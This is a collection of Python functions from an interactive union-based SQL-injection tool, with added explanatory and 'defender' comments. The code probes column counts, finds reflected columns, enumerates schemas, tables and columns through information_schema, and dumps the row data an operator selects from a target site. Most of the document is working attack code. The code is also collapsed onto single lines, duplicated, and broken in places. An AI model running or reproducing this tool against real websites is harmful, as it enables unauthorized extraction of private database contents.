# Python 2 (print statement). Union-based SQL-injection enumeration helper.
# Swaps the "@@datadir" marker in the probe URL for a group_concat() over
# schema_name, rewrites the trailing "--" so the query reads from
# information_schema.schemata, fetches the page with get_the_page(site, "2")
# and returns the list that s_data.search_for() extracts from it (the same list
# is also printed). Despite the function's name, the query it sends lists schema
# names, not the server's data directory. get_the_page, s_data and the meaning
# of the "2" mode argument are defined outside this listing. A second
# loc_db_files() further down shadows this one if both live in one module.
# Defender note: "information_schema.schemata", "group_concat(" and "unhex(hex("
# in a query string are the request-side artefacts a WAF rule or access-log
# review keys on; parameterised queries on the server remove the injection point.
def loc_db_files(site): site = site.replace("@@datadir","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))") site = site.replace("--","+from+information_schema.schemata--") the_page = get_the_page(site,"2") directory = s_data.search_for(the_page) print directory return(directory)
# Python 2 (print statement). Same body as loc_db_files() except that the marker
# replaced is "@@hostname": the substituted expression still selects schema_name
# from information_schema.schemata, so the value printed and returned is the
# schema list extracted by s_data.search_for(), not a hostname. Relies on
# get_the_page and s_data from elsewhere in the module. A second host_name()
# further down shadows this definition when both are loaded.
def host_name(site): site = site.replace("@@hostname","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))") site = site.replace("--","+from+information_schema.schemata--") the_page = get_the_page(site,"2") host_name = s_data.search_for(the_page) print host_name return(host_name)
# Lists database (schema) names reachable through the injection point.
# Replaces the "@@version" marker with a group_concat() over schema_name, appends
# "+from+information_schema.schemata" before the comment terminator, fetches the
# page and hands the extracted list to print_cols_tables(..., 'Databases')
# before returning it. No print statement here, so this one is version-neutral;
# get_the_page, s_data and print_cols_tables come from outside this listing.
# names() is defined a second time further down (without the printing call);
# in a single module the later definition wins.
def names(site): site = site.replace("@@version","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))") site = site.replace("--","+from+information_schema.schemata--") the_page = get_the_page(site,"2") db_names = s_data.search_for(the_page) print_cols_tables(db_names,'Databases') return(db_names)
# Returns the first value s_data.search_for() extracts after the "@@version"
# marker in the probe URL is replaced by a wrapped user() call. The local name
# `user` shadows the function itself inside the body (harmless here, but easy to
# misread). Raises IndexError if nothing is extracted, since user[0] is returned
# unconditionally. Version-neutral syntax; a second user() near the end of the
# listing (which prints instead of returning) shadows this one if both are loaded.
def user(site): site = site.replace( "@@version", "unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,user(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))" ) the_page = get_the_page(site, "2") user = s_data.search_for(the_page) return user[0]
# Returns the name of the database the injected query runs in: replaces the
# "@@version" marker with a wrapped database() call and returns the first
# element s_data.search_for() extracts (IndexError if the list is empty).
# Version-neutral syntax. A second, interactive working_db() further down
# (Python 2: print / raw_input) shadows this one when both are loaded.
def working_db(site): site = site.replace( "@@version", "unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,database(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))" ) the_page = get_the_page(site, "2") db = s_data.search_for(the_page) return db[0]
# Second definition of names(): identical query construction to the earlier one
# (schema_name over information_schema.schemata via the "@@version" marker) but
# it only returns the extracted list and does not print it. Version-neutral
# syntax; depends on get_the_page and s_data from outside this listing.
def names(site): site = site.replace( "@@version", "unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))" ) site = site.replace("--", "+from+information_schema.schemata--") the_page = get_the_page(site, "2") db_names = s_data.search_for(the_page) return (db_names)
# Second definition of loc_db_files(), Python 2 (print statement). Same logic as
# the first: the "@@datadir" marker becomes a group_concat() over schema_name
# read from information_schema.schemata, so the printed/returned list is the
# schema list rather than a data-directory path. Only whitespace differs from
# the earlier copy; whichever is defined last in the module is the one called.
def loc_db_files(site): site = site.replace( "@@datadir", "unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))" ) site = site.replace("--", "+from+information_schema.schemata--") the_page = get_the_page(site, "2") directory = s_data.search_for(the_page) print directory return (directory)
# Second definition of host_name(), Python 2 (print statement). As in the first
# copy, the "@@hostname" marker is replaced by the schema_name query, so the
# value printed and returned is the extracted schema list. The local `host_name`
# shadows the function name inside the body.
def host_name(site): site = site.replace( "@@hostname", "unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))" ) site = site.replace("--", "+from+information_schema.schemata--") the_page = get_the_page(site, "2") host_name = s_data.search_for(the_page) print host_name return (host_name)
# Python 3 variant (input(), binascii.unhexlify on bytes, print()) of the
# column-enumeration / row-dump step; a Python 2 variant with an extra
# `database` parameter appears further down. Given `site` (probe URL ending in
# the information_schema.columns predicate), `table` (hex-encoded table name)
# and `based` (suffix re-appended to the URL), it fetches the column list,
# prints it via print_data(), prompts the operator for column names, rewrites the
# SELECT list for the chosen columns and prints the extracted rows or
# "No data found!". Returns None. Requires `binascii` plus get_the_page, s_data
# and print_data from outside this listing. The original indentation was lost
# when the function was collapsed onto one line, so which statements sit inside
# `if total_cols:` cannot be recovered with certainty; kept byte-for-byte.
# Defender note: the "+FROM+information_schema.columns+WHERE+table_name=0x"
# fragment and the "/**/" comment-as-whitespace trick are what request-side
# filtering and log review should match on.
def search_in_columns(site, table, based): site = site + table + "--" + based the_page = get_the_page(site, "2") columns_found = s_data.search_for(the_page) total_cols = len(columns_found) if total_cols: print_data(columns_found, ['Columns Found']) back_table = table table = table.encode() table = binascii.unhexlify(table) table = table.decode() site = site.replace( "+FROM+information_schema.columns+WHERE+table_name=0x" + back_table + "--", "+AS/**/details/**/FROM/**/" + table + "--") columns = input("Give the columns: ") selected_columns = [] for column in columns_found: if column in columns: selected_columns.append(column) site = site.replace("column_name", "%s,/**/" % selected_columns[0]) for i in range(1, len(selected_columns)): site = site.replace( ",/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,", ",0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,%s,/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e," % selected_columns[i]) site = site.replace(",/**/", '') site = site.replace(",0x3e0x0a", ",0x3e,0x0a") the_page = get_the_page(site, "2") total_data = [] total_data = s_data.search_for(the_page) if not len(total_data): print("No data found!") else: print_data(total_data, selected_columns)
# Interactive Python 2 variant of working_db() (print statement, raw_input).
# Resolves the current database through the "@@version" marker as the other
# copy does, prints "You are on: ... database", then loops until the operator
# answers y/Y/n/N. Returns db[0] when the answer is n/N and the sentinel
# string '1' otherwise; the top-level run below checks `if ans=='1':` and then
# prompts for a database name, so '1' means "caller should ask which DB".
# Raises IndexError if s_data.search_for() extracted nothing. The nesting of
# the final if/else was lost in the one-line collapse; kept byte-for-byte.
def working_db(site): site = site.replace("@@version","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,database(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))") the_page = get_the_page(site,"2") db = s_data.search_for(the_page) print "You are on: %s database" %db[0] ans = raw_input("Do you want to change the database?(y/n): ") while ans!='Y' and ans!='y' and ans!='n' and ans!='N': ans = raw_input("Do you want to change the database?(y/n): ") if ans=='n' or ans=='N': return(db[0]) else: return('1')
# Method of a class whose header is not in this listing (Python 3 style:
# print()). Fetches self.site, stores the page in self.the_page and the
# extracted table list in self.tables, and terminates the whole process with
# exit() when the list is empty (no exception for the caller to handle). On
# success it prints the list via print_data(), rewrites self.site through
# replaces.repl(self.site, 3, self.working_on_db) — the helper's semantics are
# not visible here — and, when self.based is non-empty, strips that suffix from
# the URL. Reads self.site, self.based, self.working_on_db; returns None.
# Collapsed onto one line on this page, so statement nesting is inferred.
def find_tables_of_database(self): self.the_page = get_the_page(self.site, "2") self.tables = s_data.search_for(self.the_page) if not len(self.tables): print("Could not get the tables, program will exit.") exit() print_data(self.tables, ['Tables Found']) self.site = replaces.repl(self.site, 3, self.working_on_db) if not self.based == '': self.site = site.replace(self.based, '')
# Python 2 variant of search_in_columns() (raw_input, print statement, and the
# Py2-only str.decode("hex") / str.encode("hex") codecs, which do not exist in
# Python 3). Differs from the Python 3 copy above by the extra `database`
# argument, which is prefixed to the decoded table name when the
# information_schema.columns predicate is swapped for the real table, and by
# passing `table` through to print_data(). Prints the column list with
# print_cols_tables(), prompts for column names, rewrites the SELECT list for
# the chosen columns and prints the extracted rows or "No data found!".
# Returns None. Nesting after `if total_cols:` is not recoverable from the
# collapsed line; kept byte-for-byte.
def search_in_columns(site, table, based, database): site = site + table + "--" + based the_page = get_the_page(site, "2") columns_found = s_data.search_for(the_page) total_cols = len(columns_found) if total_cols: print_cols_tables(columns_found, 'Columns Found') table = table.decode("hex") site = site.replace( "information_schema.columns+WHERE+table_name=0x" + table.encode("hex") + "--", database + '.' + table + "--") columns = raw_input("Give the columns: ") selected_columns = [] for column in columns_found: if column in columns: selected_columns.append(column) site = site.replace("column_name", "%s,/**/" % selected_columns[0]) for i in range(1, len(selected_columns)): site = site.replace( ",/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,", ",0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,%s,/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e," % selected_columns[i]) site = site.replace(",/**/", '') site = site.replace(",0x3e0x0a", ",0x3e,0x0a") the_page = get_the_page(site, "2") total_data = [] total_data = s_data.search_for(the_page) if not len(total_data): print "No data found!" else: print_data(total_data, selected_columns, table)
site=replaces.repl(site,1,vuln_column) dbs.version(site) dbs.user(site) dbs_names=dbs.names(site) ans=dbs.working_db(site) if ans=='1': ans=raw_input("On which Database you want to work on?: ") while ans not in dbs_names: ans=raw_input("Wrong Input!\nOn which Database you want to work on?: ") site=replaces.repl(site,2,ans) the_page=get_the_page(site,"2") tables=s_data.search_for(the_page) if len(tables)==0: print "Could not get the tables, program will exit." exit() print_cols_tables(tables,'Tables Found') site=replaces.repl(site,3,ans) site=site.replace(based,'') flag = 1 site1 = site while flag==1: print "Give the table: " table_choose=raw_input(">>> ") while not(table_choose in tables): print "Wrong input. Give the table: "
# Python 2 (print statement, raw_input). End-to-end interactive driver for the
# union-based enumeration flow; `self` is never read. Prompts for a URL, checks
# it with site_alive() and vuln() (both external; several failures call exit()
# on the whole process), uses ft_cols() to find the column count, builds the
# "+UNION+SELECT+1,2,...--" probe, scans the response for the first reflected
# column number, then substitutes @@version and matches it against the
# hard-coded `versions` list (falling back to a "5.0"/"5.1" substring check).
# It then enumerates table names from information_schema.tables, prompts for a
# table and columns, and prints the extracted rows column-by-column; the
# k%2 branch selects s_data.search_for() versus s_data.search_for_2() for
# splitting the response. Prompts such as "Dose ena column ..." and
# "8es na deis gia allo table?" are transliterated Greek ("give a column",
# "want to see another table?"); "Den uparxoun vulnerable columns" means
# "there are no vulnerable columns". Runtime strings are kept unchanged.
# Page artefact: the literal "Wrong input. Give the table: " is split across
# two lines here (a string broken by a newline is a syntax error as printed);
# the two lines are kept byte-for-byte rather than re-joined, and the nesting
# of the loops is not recoverable from the collapsed text.
# Defender note: the "+OrDER+By+" probing, numbered UNION SELECT lists,
# "@@version" and the information_schema.tables/columns predicates are the
# request sequence that WAF rules and access-log analytics should flag;
# the application-side fix is parameterised queries plus a least-privilege
# database account.
def union_normal(self): versions = ["5.1.41","5.1.61","5.0.96","5.1.66","5.1.56"] check = 3 flag='1' while flag=='1': a=1 site=raw_input("Give the url: ") site=site_alive(site) if site=="-1": print "No response from server" print "Program will exit" exit() flag=vuln(site) if flag=="-1": exit() site1=site site1=site1+"+OrDER+By+" columns=ft_cols(site,site1) if columns==-1: exit() site1=site1.replace("+OrDER+By+","") num_columns="1" for i in range (2,columns+1): if i==(columns+1): num_columns=num_columns+str(i) else: num_columns=num_columns+","+str(i) site=site1+"+UNION+SELECT+%s--" %num_columns site=site.replace("'","") site=site.replace(flag,flag+"-") vuln_column=1 flag=1 the_page = get_the_page(site) while flag==1: if (">"+str(vuln_column)+"<") in the_page: flag=0 else: vuln_column=vuln_column+1 if vuln_column>columns: flag=2 if flag==2: print "Den uparxoun vulnerable columns" print "Program will exit" exit() vuln_column=str(vuln_column) site=site.replace(",%s" %vuln_column,",@@version",1) the_page=get_the_page(site) flag=1 index=0 while index<len(versions): if versions[index] in the_page: print "SQL Version: %s" %versions[index] index=len(versions)+1 else: index=index+1 if flag==1: if ("5.0" in the_page) or ("5.1" in the_page): flag=0 if flag==1: print "Could not get the DB version." print "Program will exit" exit() site=site.replace("@@version","unhex(hex(group_concat(0x3a,0x3a,table_name,0x3a,0x3a,0x0a)))") site=site.replace("--","+FROM+information_schema.tables+WHERE+table_schema=database()--") the_page=get_the_page(site) tables=s_data.search_for(the_page) print "Tables found %d" %len(tables) print tables site=site.replace("table_name","column_name") site=site.replace("+FROM+information_schema.tables+WHERE+table_schema=database()--","+FROM+information_schema.columns+WHERE+table_name=0x") flag=1 site1=site while flag==1: print "Give the table: " table1=raw_input(">>>") while not(table1 in tables): print "Wrong input. 
Give the table: " table1=raw_input(">>>") table1=table1.encode("hex") site=site1+table1+"--" the_page=get_the_page(site) columns_found=s_data.search_for(the_page) if len(columns_found)==0: print "No columns found. Do you want to try an other table? (y/n)" ans=raw_input(">>>") while not(ans=='y' or ans=='n' or ans=='Y' or ans=='N'): print "No columns found. Do you want to try an other table? (y/n)" ans=raw_input(">>>") if ans=='N' or ans=='n': print 'Program will Exit' exit() else: flag=1 elif flag==1: print "Columns Found %d" %len(columns_found) print "="*80 print columns_found print "="*80 k=0 ks=[] table_choose=table1.decode("hex") site=site.replace("information_schema.columns+WHERE+table_name=0x"+table1+"--",table_choose+"--") tal_cols=len(columns_found) while tal_cols>0: col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ") while not(col_choose in columns_found) and not(col_choose=='0'): col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ") if col_choose=="0": tal_cols=0 site=site.replace(",/**/","") else: if tal_cols==len(columns_found): site=site.replace("column_name","%s,/**/" %col_choose) tal_cols=tal_cols-1 k=1 ks.append(col_choose) else: site=site.replace(",/**/",",0x3a,0x3a,%s,/**/"%col_choose) tal_cols=tal_cols-1 if tal_cols==0: site=site.replace(",/**/",'') ks.append(col_choose) k=k+1 the_page=get_the_page(site) length=len(the_page) if k%2==1: total_data=s_data.search_for(the_page) else: total_data=s_data.search_for_2(the_page,k) length=len(total_data) l=0 for i in range (0,length,k): j=0 while j<k: if j+1==k: print ks[j],":",total_data[l],"|" j=j+1 l=l+1 else: print ks[j],":",total_data[l],"|", j=j+1 l=l+1 ans=raw_input("8es na deis gia allo table? (y/n): ") while not (ans=='y' or ans=='Y' or ans=='n' or ans=='N'): ans=raw_input("8es na deis gia allo table? (y/n): ") if ans=='y' or ans=='Y': flag=1 else: flag=0
# Second definition of user(), Python 2 (print statement). Same "@@version" ->
# user() substitution as the earlier copy, but this one prints
# "Current user is: ..." and returns None instead of returning the value.
# Raises IndexError if s_data.search_for() extracts nothing. The local `user`
# shadows the function name inside the body. Whichever definition is loaded
# last is the one the top-level run's dbs.user(site) call resolves to.
def user(site): site = site.replace("@@version","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,user(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))") the_page = get_the_page(site,"2") user = s_data.search_for(the_page) print "Current user is: %s" %user[0]